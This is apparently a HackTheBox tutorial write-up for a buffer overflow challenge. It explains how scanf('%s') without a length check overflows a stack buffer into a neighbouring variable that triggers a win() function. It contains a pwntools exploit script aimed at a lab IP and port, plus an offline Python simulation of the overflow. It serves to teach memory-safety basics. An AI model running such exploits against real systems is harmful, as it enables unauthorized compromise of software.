$ cat writeup.md…
hackthebox
Task: Tutorial challenge with 64-bit ELF binary using scanf without length check. Solution: Buffer overflow to overwrite adjacent stack variable and trigger win condition.
Tutorial challenge for learning buffer overflow basics. The binary, gs, is a 64-bit ELF with Full RELRO, NX and PIE enabled but no stack canary. None of those mitigations matters here: the overflow only changes a neighbouring data variable, so no address has to be leaked and no code runs from the stack.
Target: 94.237.63.176:35784
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
rbp-0x30 (offset -48): Buffer[32 bytes] <- user input
rbp-0x10 (offset -16): Alignment[8 bytes] <- initialized to 0x6969696969696969
rbp-0x08 (offset -8): Target[8 bytes] <- initialized to 0xdeadbeef
rbp: Saved RBP
rbp+0x08: Return address
The program uses scanf("%s") to read user input into a buffer without length checking — classic buffer overflow.
17c5: movl $0xdeadbeef, %eax
17ca: cmpq %rax, -0x8(%rbp)   ; compare target with 0xdeadbeef (the movl zero-extends eax into rax)
17ce: jne 0x17dc              ; not equal: jump to the win call
17dc: callq 0x11f5 <win>      ; win() reads and prints flag.txt
Because the branch is jne, any value other than 0xdeadbeef in target makes the jump taken and win() is called; the exact value written does not matter.
Send 40 bytes to fill buffer (32) + alignment (8); whatever follows lands on target. Two details of scanf("%s") matter: it stops at the first whitespace byte (0x09-0x0d, 0x20), so the payload must not contain any, and it appends a NUL after the copied bytes, so even a bare 40-byte input already zeroes the low byte of target.
[AAAA...AAAA][BBBBBBBB][CCCCCCCC]
Buffer(32) Align(8) Target(8) <- overwritten!
#!/usr/bin/env python3
from pwn import *

IP = '94.237.63.176'
PORT = 35784

r = remote(IP, PORT)

# 32 bytes of buffer + 8 bytes of alignment reach target; the next 8 bytes
# replace 0xdeadbeef with 0x4242424242424242, which is all the jne needs.
# No whitespace in the payload: scanf("%s") would stop reading there.
payload = b'A' * 40 + b'BBBBBBBB'

r.recvuntil(b'>')
r.sendline(payload)          # the trailing '\n' is where scanf stops

# win() prints flag.txt; pull the flag out of the response
r.recvuntil(b'HTB{', timeout=5)
flag = b'HTB{' + r.recvuntil(b'}')
success(f'Flag: {flag.decode()}')
r.close()
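To make the overwrite and the scanf("%s") caveats concrete without the remote target, here is an added example (not code from the challenge or the original writeup) that models the gs stack frame from the offsets listed above, applies a scanf("%s")-style unbounded copy to it, and evaluates the cmpq/jne condition. The saved rbp and return address values are constructed placeholders, and `simulate`, `build_payload` and the other names are my own.

```python
"""Offline model of the gs stack frame (added example, not the challenge's code).

Layout follows the writeup: buffer at rbp-0x30, alignment qword at rbp-0x10,
target at rbp-0x08, then saved rbp and the return address. Offsets below are
measured from the start of buffer.
"""
import struct

BUF = 0x00          # rbp-0x30, 32-byte buffer scanf writes into
ALIGN = 0x20        # rbp-0x10, initialised to 0x6969696969696969
TARGET = 0x28       # rbp-0x08, initialised to 0xdeadbeef
SAVED_RBP = 0x30    # rbp
RETADDR = 0x38      # rbp+0x08
FRAME_LEN = 0x40

INIT_ALIGN = 0x6969696969696969
INIT_TARGET = 0xDEADBEEF
FAKE_SAVED_RBP = 0x7FFFFFFFE0F0    # constructed placeholder, not a real value
FAKE_RETADDR = 0x00005555555552A0  # constructed placeholder, not a real value

# Bytes isspace() accepts in the C locale: "%s" skips them at the start and
# stops at the first one afterwards. NUL is deliberately not in this set.
SCANF_STOP = b" \t\n\v\f\r"


def initial_frame() -> bytearray:
    """Frame as it looks just before scanf runs (buffer uninitialised -> zeros here)."""
    f = bytearray(FRAME_LEN)
    struct.pack_into("<Q", f, ALIGN, INIT_ALIGN)
    struct.pack_into("<Q", f, TARGET, INIT_TARGET)
    struct.pack_into("<Q", f, SAVED_RBP, FAKE_SAVED_RBP)
    struct.pack_into("<Q", f, RETADDR, FAKE_RETADDR)
    return f


def scanf_s(frame: bytearray, stdin: bytes) -> int:
    """Model scanf("%s", buffer): skip leading whitespace, copy up to the next
    whitespace byte, then append the terminating NUL. There is no length
    check, so the copy runs straight past the 32-byte buffer (the bug)."""
    token = stdin.lstrip(SCANF_STOP)
    for i, b in enumerate(token):
        if b in SCANF_STOP:
            token = token[:i]
            break
    written = token + b"\x00"
    if len(written) > FRAME_LEN:
        raise ValueError("input runs off the modelled frame")
    frame[BUF:BUF + len(written)] = written
    return len(written)


def qword(frame: bytearray, off: int) -> int:
    return struct.unpack_from("<Q", frame, off)[0]


def simulate(stdin: bytes) -> dict:
    """Feed one stdin blob through the model and report what the binary would see."""
    f = initial_frame()
    n = scanf_s(f, stdin)
    return {
        "bytes_written": n,
        "target": qword(f, TARGET),
        # cmpq %rax, -0x8(%rbp); jne win  ->  win() runs when target != 0xdeadbeef
        "win": qword(f, TARGET) != INIT_TARGET,
        "saved_rbp_intact": qword(f, SAVED_RBP) == FAKE_SAVED_RBP,
        "retaddr_intact": qword(f, RETADDR) == FAKE_RETADDR,
    }


def build_payload(target_bytes: bytes = b"BBBBBBBB") -> bytes:
    """The writeup's payload: 32 buffer bytes + 8 alignment bytes, then the
    8 bytes that replace target. Rejects whitespace, which "%s" would stop on."""
    payload = b"A" * (TARGET - BUF) + target_bytes
    if any(b in SCANF_STOP for b in payload):
        raise ValueError('payload contains a byte scanf("%s") treats as whitespace')
    return payload


if __name__ == "__main__":
    cases = [
        ("writeup payload", build_payload() + b"\n"),          # sendline appends '\n'
        ("exactly 40 bytes", b"A" * 40 + b"\n"),                # only the NUL reaches target
        ("space inside", b"A" * 20 + b" " + b"A" * 27 + b"\n"),  # copy stops early
    ]
    for label, data in cases:
        print(f"{label:18s} {simulate(data)}")
```

Running it shows three things the page's script does not: the writeup's 48-byte payload plus the implicit NUL also zeroes the low byte of saved rbp (harmless, because win() runs before main returns), a plain 40-byte input already flips target to 0xdeadbe00, and a single space inside the input cuts the copy short and leaves target untouched.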
...